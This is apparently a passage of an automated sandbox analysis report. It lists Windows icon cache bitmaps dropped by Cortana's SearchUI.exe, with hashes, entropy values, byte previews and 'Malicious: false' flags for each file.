                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):2.685688058378997
                      Encrypted:false
                      SSDEEP:768:qVv6VlVMVHVVVVVVVVVVVVVVVVVVVVVVVVVgJJJJJJX:
                      MD5:DCA313EEB2FD1F494BBE186842EB2E96
                      SHA1:4737635D62DAB597FDC20F98893760098D1067BA
                      SHA-256:26017802A8D504A9A78588F400CD4312848ACA69BE6A11DF33281BDE25396B2B
                      SHA-512:62D3540191B1DE9E65A568D97B1D16320DAF883BF18219340B5594EFB2987B3A2299C47268A76B17DBC5C058CD89BA669607E945922B745FF874D7A729D3BAC3
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_MediaPlayer32
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.417905730161295
                      Encrypted:false
                      SSDEEP:384:lRM8MnnhRJPv8iHMiJ07HLwLwmjjujjR5m694lN444y84444UV4444K7444444R5:7jUnhDrHMiS7rwLwmjjujj/mZAZ7rzN
                      MD5:E1AA86A6110404C34E05C063601112AD
                      SHA1:0680868AEE468FCE12215D90684C4C7CF7769B34
                      SHA-256:AF63B4E541130D09289A3C6852DE203F2723792BAB7464559459A732D553F8BD
                      SHA-512:FCE875B8AB57AE028C3BDD3ADC645075BABB7244A9C3338ABF2CE871E56722C895610ED2001C1C84DE34C2837616BA3664839E0985F42FF164B1549E909C07C0
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Photos_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):0.9236847415032687
                      Encrypted:false
                      SSDEEP:6:mqtgX/mu0000000000000000000000000000000000000000000000000000000j:mqYmuKaegnC3FJVfy01qlHy9FXXX1
                      MD5:4C9E2799DEB40FFAE060F49AC2803C80
                      SHA1:D25F5CF3BC3E3627C9BD87DADC18422CC49A6328
                      SHA-256:B7F489CF209EB744097F4A374C1045A3896C789686B4BE5AA7C576267C29EFC4
                      SHA-512:DC5322025F5EBC4B2E290C8315A36518E2DF78D3D01580AC9FAFE10B4C59B35F4032194E1D9189377388EF30729C62FD6C8825EE00908630F244CC59C0D1E976
                      Malicious:false
                      Preview: BM............|...,...,..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Photos_8wekyb3d8bbwe!SecondaryEntry
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):0.9514927819801636
                      Encrypted:false
                      SSDEEP:12:mqYmuU/HeH3LCHmhH9fNmxPmtHPG1HPtUND6PuHPutHPfDTPfHPfH/V:mqL
                      MD5:8DB89B48B8EDBB416F60B9B79F46E024
                      SHA1:6E6E9D89BD3D1D8B7F244BBB2A45C386776121EE
                      SHA-256:2B1547CA7FF16B7159B312258D0853E1D9216BE5E27748F59FF6B454B69DF684
                      SHA-512:1852683B6F744D1D08C35D0AA4467F798D374F6A2C8E11E86BEF1A2C390E089C2ED749BEE5AFDDABBE071BA60E22C8C509D65477621D15CEE5962EDCC6907324
                      Malicious:false
                      Preview: BM............|...,...,..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_RemoteDesktop
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.50665318619026
                      Encrypted:false
                      SSDEEP:384:FTU0p6EZl8eBZXd+53Nq2MsNeN4DXtaokxN/yxHgpOI1SpIFp:FTU0p6Ul8AMNq2DN1XtaryupOI1Sp
                      MD5:C29EF40B14D06595314AB1F6634EE474
                      SHA1:FAF7420E380424794DAE3192186F4E5263D1EC1C
                      SHA-256:4121EC51B50F6B8D459C56D92058AF3AC611B00D7245D7B39145D47445E7273F
                      SHA-512:60A472A5867D3FC79E5023EC260FD00DD48D207423B336A9C7393FD8A7303E88B2AECB005F652F2A983D522EC878011DBE797FF56BCF9079A43A4E971F8F4531
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................(...9...E...J...J...C...8...*..................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_SecHealthUI_cw5n1h2txyewy!SecHealthUI
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):0.812156585837869
                      Encrypted:false
                      SSDEEP:6:mqtgX/mu0000000000000000000000000000000000000000000000000000000X:mqYmuma6mSGS62fvKC7KQ
                      MD5:B2D6871398C3A84AD2DFC54633867A33
                      SHA1:460CCC1F7902B7A128BF0C6B2B3810B5B3022DDB
                      SHA-256:603FD28808B3250170EEB8569129A8FCBA1A7CE5A7F94B66907D829D6B9C1256
                      SHA-512:77609DBFC00C450E489C3966B16F18D4190BED102E8143BFF6D998785C780B763998357ECAF184D48BA3E35014BB3562092118F38CAF2874D91240F8D8AC32B9
                      Malicious:false
                      Preview: BM............|...,...,..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Shell_RunDialog
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):2.0710208312018605
                      Encrypted:false
                      SSDEEP:768:XmmmmmmmmmmmmmmmmmmmmmmmmmmmmmLuTgKqvO0y1S7M08YHyHvwaKwZjLV2y4R5:9ZN+dh
                      MD5:0CA04AEE62BDD5F8941D065E72B4575B
                      SHA1:ACE12ED4A8A453E42FDAB7FFEE2070445954B4B0
                      SHA-256:B0721630850601FC849068539AA7D4984EB3A959F2D40ACACEC1AB0FFC9CEB3B
                      SHA-512:A9B8498F2DB9E9C880C346F557E6E6D75AD2866C9D42991D763E78B1BB4A7EEB1ED444A35051AAF5648F8416D7CBD569E07C24048D110C12882321ADE493DBB5
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW................................................................................???(III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-:::'....PPP)...4...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...5:::'ddd0...$..........................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_YourPhone_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):1.8439686281042036
                      Encrypted:false
                      SSDEEP:6:mqtgX/0FGCCCCCCCCCCCCCCCCO3GCCCCCCCCCCCCCCCCO3GCCCCCCCCCCCCCCCCf:mqYobbbbbbbHHHHHHHHHHe0WpW0W0
                      MD5:45CF23B43ADC915875D3F4E4DE2BCDA1
                      SHA1:F513D85D749F6EB03FD54F8D09095C6331093D64
                      SHA-256:F4CB027B2479815B061FF2696E760E8E5A5EF50FDC968D93F3DC7DF0F24B256F
                      SHA-512:A2E5D9C548CD2D7CE27AC3D25D0A4359DE517791E3C03F775B6397DC285FE811A5D9E7D2A0A5491BE50CEDE09389AAC779896182B963A36B2E1F74C259DA2A0E
                      Malicious:false
                      Preview: BM............|...,...,..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_ZuneMusic_8wekyb3d8bbwe!Microsoft_ZuneMusic
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):1.0175256814770415
                      Encrypted:false
                      SSDEEP:12:mqYmuOHe7r6qPSf6TaSviiaiPbaLzr/C6C2rSbaLniKifaSCfDveWKLe7/:mq7rqP3uv/Ou3//vWunvHrWWeY
                      MD5:133B21D2FD5A8456BB6C631470E70DC2
                      SHA1:14EC35EDCCE2EB9F913655AE9AADC89ED338F4DE
                      SHA-256:85AB82DEACF5A3DC31BBC2691443E1AD7769B7ABE26952B42E1B29DF7FDDC03C
                      SHA-512:8EEFC8AFBABA64D68D163A021F4A51E551B4FF709CA3C77EFA78085835EFB51A132AF829B5AF89C981E7096828A6782FE5284F46A0C68E7CA92B9A6D2D750B87
                      Malicious:false
                      Preview: BM............|...,...,..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_ZuneVideo_8wekyb3d8bbwe!Microsoft_ZuneVideo
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):0.829578043990811
                      Encrypted:false
                      SSDEEP:6:mqtgX/mu00000000000000000000000000000000000000000000000000000003:mqYmuyLbeOb72b22ebOQ
                      MD5:52A68F652E4564B0982F2871E9C689A8
                      SHA1:F0980F219E8066C9D1E2A3D69DB9A23D5AB3B263
                      SHA-256:4DB290AC285B4D57A2CA70D9A36677936F7C71FD0E1B01CE65EBC0D90FD50007
                      SHA-512:2EDDFF16B382CE6DFFE54046CA155ED41A169AF1631A57F4A9FDEAD5665C4C0AB8715A2C0FC20B440343E568C960022F954A96015059B66BC6988C04F49492EC
                      Malicious:false
                      Preview: BM............|...,...,..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\https___java_com_
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):2.637977059894628
                      Encrypted:false
                      SSDEEP:768:XmmmmmmmmmmmmmmmmmmmmmydiXjPJdKQ7ai3ZigbmY9//JD9UZ99tS0FVGn4YEbR:fig1Z
                      MD5:8AAAD0F4EB7D3C65F81C6E6B496BA889
                      SHA1:231237A501B9433C292991E4EC200B25C1589050
                      SHA-256:813C66CE7DEC4CFF9C55FB6F809EAB909421E37F69FF30E4ACAA502365A32BD1
                      SHA-512:1A83CE732DC47853BF6E8F4249054F41B0DEA8505CDA73433B37DFA16114F27BFED3B4B3BA580AA9D53C3DCC8D48BF571A45F7C0468E6A0F2A227A7E59E17D62
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW................................................................................???(III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-:::'....PPP)...4...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...5:::'ddd0...$..........................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\microsoft_windowscommunicationsapps_8wekyb3d8bbwe!microsoft_windowslive_calendar
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):1.0051505361061857
                      Encrypted:false
                      SSDEEP:12:mqYmuEXXXbrrXbrrXbrrXXXbrrrnbrrrnbrrrnXXLrrnLrrnLrrnXXrbT/xprdpB:mqDyMT3
                      MD5:98393C7B0995B5EA22863C98377BE588
                      SHA1:CA35C10C79261F0E2BDC3B596D5B5790B328C46F
                      SHA-256:71FB634CF9E8CFD10D28CA432043B703185956EBA62164D08533B3E60BA881D5
                      SHA-512:B9056DA4870E86867D180D0E73E3EB69E59B9C9A9B81BEAA581854248ADC446A1FA84F56343240F7A5F620ADA5FE334D7BBE4CCBE808EF3728026B876553729F
                      Malicious:false
                      Preview: BM............|...,...,..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\microsoft_windowscommunicationsapps_8wekyb3d8bbwe!microsoft_windowslive_mail
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):0.7469853921101441
                      Encrypted:false
                      SSDEEP:12:mqY8HHRbsZKIW93cPt34tVl9l5tlNTNNXzTjTzTDTTTn:mqHDH0JI
                      MD5:0F876B1B78784DF02FF3F5EA8C95AE44
                      SHA1:EDB8D39A3FFFFF66E01CDA3CE490AB0143913AB2
                      SHA-256:F7AA9F0A474474B41E242DF54A7BF9C9031B0BB891AD1931A40D15961F4FDE80
                      SHA-512:3D5A2F3ACFA0FA825DB92EA9B5A9B8040B8C39D9A16A15FD1915C0B5216ADB5144EF5960E99792418B8391418552CEAD22A89CDA84D413BD4BCAE20433861D1B
                      Malicious:false
                      Preview: BM............|...,...,..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\windows_immersivecontrolpanel_cw5n1h2txyewy!microsoft_windows_immersivecontrolpanel
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):1.106127270747805
                      Encrypted:false
                      SSDEEP:12:mqYmuUfY3IaXjTXk2XH/HHMtkt3LXe36oHnU89U89U89U89H3kXeoXMtkt3H/HHI:mqtyFXQy6
                      MD5:744A0320026EB91C3F475B4CEB3A39A9
                      SHA1:65F61BF6A7E5094F68656494A59553C1C64123DA
                      SHA-256:B003C371A0DC78F40822F9959E084AD23CBB605DC362F04FFF880459BDE1B63E
                      SHA-512:1E961B5C1D77C81EC0F326608A1E12511A4A0041A458B4551C17859B3AFB83D98CA3C84CD8FF771684A6747F6DF2AC82FE5851132034C1C42C8BD1029F4734BA
                      Malicious:false
                      Preview: BM............|...,...,..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_MdSched_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):5.807418763306762
                      Encrypted:false
                      SSDEEP:384:XQlVoU2RiTJyXZd7M2C6il/TmpORr4FJtRnEgkM:AYUiiTJypd1Zil0Jn/nE5M
                      MD5:2BD136EB4CB4539C66599B66221DBBBA
                      SHA1:22532C9B312CCE5D6E593955B795CB2BA2857124
                      SHA-256:AEC7C44A6C41813E7A0DF059F38D60C3A4FBE51683D3F9D17E8DAF67C0A5C8E6
                      SHA-512:22EF6A2565C30912F65E7B6F5E53981D514F3881E457DD7761BB4E7E286F22BBA5E3CE6D0A2F7C02971D801A4E999E0D6CA4AA6B7BB935249CC947E2B3D2766A
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_RecoveryDrive_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):2.8183363519681013
                      Encrypted:false
                      SSDEEP:384:V9AX3Vmo3UwjcMYRYA9HEPZRVaaluY2PuA8KXY:fG5vc2oPunK
                      MD5:295E1773200FAAAF90FDE45E9756FADD
                      SHA1:8A2C49076F59739C7E69F19852D4EA0A772AF2A3
                      SHA-256:F795251AFD7834282AD149D10BEBF7DCEEA04BA56A960B7B9E3899E4287F1385
                      SHA-512:F0CD5D2E0B82D40C7256B4560E461B3EEFA73FE51AC6679F29928FAAB673276BA12190DCAA404B89664BDB38E4DA04C968E1DB694410C9FB68D5234B58278D14
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_SnippingTool_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.8115189780206427
                      Encrypted:false
                      SSDEEP:768:Zv+hoqAkG4Oqqqq/Lqqqqqq/xqqqqqqqqUyqqqqqqqsqJqqqqqqFqqqqGqqqqqC0:Zv+qqAkG4Oqqqq/Lqqqqqq/xqqqqqqqn
                      MD5:9B55B8A492DF2CE8FB6E9B0565DBCDCC
                      SHA1:B52570EBB2A3C3AA8CC3FFC6AD0955078ABD5235
                      SHA-256:E73573D120F91A45563E277015E3CA72F05FF1B18976DF5C81BD490805020F25
                      SHA-512:A8FB3C061F4B6FD17167CD8ED9F92B34B90E826B6DFC036DB33C72F960052E20C4CC0FBEF3988032EBC30449AA310149E81187BB7E6FF87F6249202F2652CC5E
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WF_msc
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):5.472339933770682
                      Encrypted:false
                      SSDEEP:768:nt7wefo76qMRxwl34vzo4UOjeSni4ILsVq:Fwe+6U47o4xjeIb
                      MD5:92E39E4BD3E216CF76A2CF3D93C53FDB
                      SHA1:6B3315770D169C632712E5BFA002610C3917D99C
                      SHA-256:BE2529BC70FAD82F5A753A3C4083D9AE5361C1E95A2C5FCE51DF6FEB442DE615
                      SHA-512:ED9C3732A6F54EFBA8313CA533EAF6E9A5EAC80977AC8028452FBFCB1429E46DE192AB2AFCF7F1D3BB1F0A1A8F31F00782424059D82022F660BC44FE133E3B6C
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................../..............................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WindowsPowerShell_v1_0_PowerShell_ISE_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.233098316757873
                      Encrypted:false
                      SSDEEP:192:Lph8tFOXKFOgFOBODOR5OIO5AOYj0T3lYERVSnnnn8pF0EIGcrx4+WiNLN2+xpSK:LT10TjVSnnnn8pc5b4
                      MD5:3CCC6610ECF9EB036FC50FDA1F781D21
                      SHA1:DE7DB115B3BD1B926AE0B2A795E7D0FEAC621851
                      SHA-256:2192613BBCF96DD824A813B59C598C486EA713A05C82FB1184EB955BC3B84839
                      SHA-512:AA3A6D68415FC17695A8DC35271617834A84B3485AF974CF34F2FF2A065AB6217DB4A19E08ABD22330DEA9D9A44963E0AA70FEDA061DB2CA6C0C29B2F4C6CA42
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WindowsPowerShell_v1_0_powershell_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.159960702416083
                      Encrypted:false
                      SSDEEP:768:vKr/VVPqdA9R222vZ5jYp3vlD5hiLYhEDXfx:vXU5ZEDXfx
                      MD5:94B56D65A8B7F7253AEACAC345D4B096
                      SHA1:7E11E248AE804D3647479A4FE5F03835A1EEE4BC
                      SHA-256:0F312587A999305794730DA6F2198C82A346E64211E2FB054256102AC70315BE
                      SHA-512:538CC0C1B4DC66E8A3C6CA9A17DDAC128441874248589BCC6C88B64AD7D3B93FF143867D6FAD0002CBB4584E951D0E82441C350396E6D59B73207A3FFE0FC055
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_charmap_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.6072689234247903
                      Encrypted:false
                      SSDEEP:384:/6Jd1uvjolavQWWo/tALCDK5Ja+ltg0aP+RO0:yJdkvMAYWZtsJawzar
                      MD5:406347732C383E23C3B1AF590A47BCCD
                      SHA1:FAE764F62A396F2503DD81EEFD3C7F06A5FB8E5F
                      SHA-256:E0A9F5C75706DC79A44D0C890C841B2B0B25AF4EE60D0A16A7356B067210038E
                      SHA-512:18905EAAD8184BB3A7B0FE21FF37ED2EE72A3BD24BB90CBFCAD222CF09E2FA74E886D5C687B21D81CD3AEC1E6C05891C24F67A8F82BAFD2ACEB0E0DCB7672CE7
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_cleanmgr_exe
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.128048266493635
                      Encrypted:false
                      SSDEEP:192:stMvREoGkaPcagsVy6aNkN556sxdmrw+N4eLu3Qj3NYwHV0XnR:ewXGlEatXamRPdmhFWQj3NnV2
                      MD5:33CF1A9AD7E502FD7C2DE69A7DA48801
                      SHA1:A71F1A144616EDA1CA60886843FAE98703417A0B
                      SHA-256:F160948153CF32D47D35BEA85ECCD51929566E662C6ECA6F838515B0860704C0
                      SHA-512:EDBEE4A88C5E5F049EC86A4B8BEADEAC89F4EEC81F1176EA35F2F689FB40F335EE1F85DF856D02D224F5FB95E4AC1E9A85CF6D54B4C436A50E478859EC9FC517
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_comexp_msc
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.349819870712939
                      Encrypted:false
                      SSDEEP:384:wPa3Nt+jJBEiqnYcnXYGiExSUGrEoikM2vVetvNSvnazbqJ:taJmiqFnXH+UGYoikR4ayzbq
                      MD5:EAB75A01498A0489B0C35E8B7D0036E5
                      SHA1:FD80FE2630E0443D1A1CEF2BDB21257F3A162F86
                      SHA-256:FDF01D2265452465FCBED01F1FDD994D8CBB41A40BBB1988166604C5450EAD47
                      SHA-512:2EC6C4F34DCF00B6588B536F15E3FE4D98A0B663C8D2A2DF06AA7CFACE88E072E2C2B1B9AAF4DC5A17B29023A85297F1A007FF60B5D6D0C65D1546BF0E12DD45
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
